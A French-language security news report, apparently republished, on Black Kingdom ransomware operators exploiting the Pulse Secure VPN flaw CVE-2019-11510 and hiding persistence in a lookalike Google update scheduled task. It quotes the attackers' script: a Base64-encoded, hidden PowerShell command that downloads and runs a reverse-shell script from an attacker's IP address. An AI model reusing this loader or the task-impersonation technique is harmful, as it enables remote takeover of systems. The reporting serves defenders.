[ad_1]
Les opérateurs de rançongiciels Black Kingdom ciblent les entreprises avec le logiciel Pulse Secure VPN non corrigé ou un accès initial sur le réseau, ont découvert des chercheurs en sécurité.
Le malware a été pris dans un pot de miel, permettant aux chercheurs d’analyser et de documenter les tactiques utilisées par les acteurs de la menace.
Mode opératoire
Ils exploitent CVE-2019-11510, une vulnérabilité critique affectant les versions antérieures de Pulse Secure VPN qui a été corrigée en avril 2019. Les entreprises ont retardé la mise à jour de leur logiciel même après que les exploits soient devenus publics, ce qui a déclenché plusieurs alertes du gouvernement américain et les acteurs de la menace ont commencé à tirer parti il; certaines organisations continuent d’exécuter une version vulnérable du produit.
REDTEAM.PL, une entreprise offrant des services de cybersécurité basée en Pologne, a observé que les opérateurs du Royaume-Uni utilisaient la même porte d’accès fournie par Pulse Secure VPN pour violer ce qu’ils pensaient être une cible.
D’après les observations des chercheurs, le ransomware a établi sa persistance en usurpant l’identité d’une tâche planifiée légitime pour Google Chrome, une seule lettre faisant la différence:
GoogleUpdateTaskMachineUSA - Black Kingdom task
GoogleUpdateTaskMachineUA - legitimate Google Chrome taskSelon l’analyse de REDTEAM.PL, la tâche planifiée exécute un code de chaîne encodé en Base64 dans une fenêtre PowerShell cachée pour récupérer un script nommé « reverse.ps1 » qui est probablement utilisé pour ouvrir un shell inversé sur l’hôte compromis.
cversions_cache.ps1 script:
$update = "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQA4AC4AMQAzAC4ANAA5AC4AMQA3ADkALwByAGUAdgBlAHIAcwBlAC4AcABzADEAJwApAA=="
powershell.exe -exec bypass -nologo -Enc $updateAdam Ziaja de REDTEAM.PL a déclaré à BleepingComputer que le script ne pouvait pas être récupéré sur le serveur distant contrôlé par l’attaquant, probablement parce que le …
Voir la source de cette publication
[ad_2]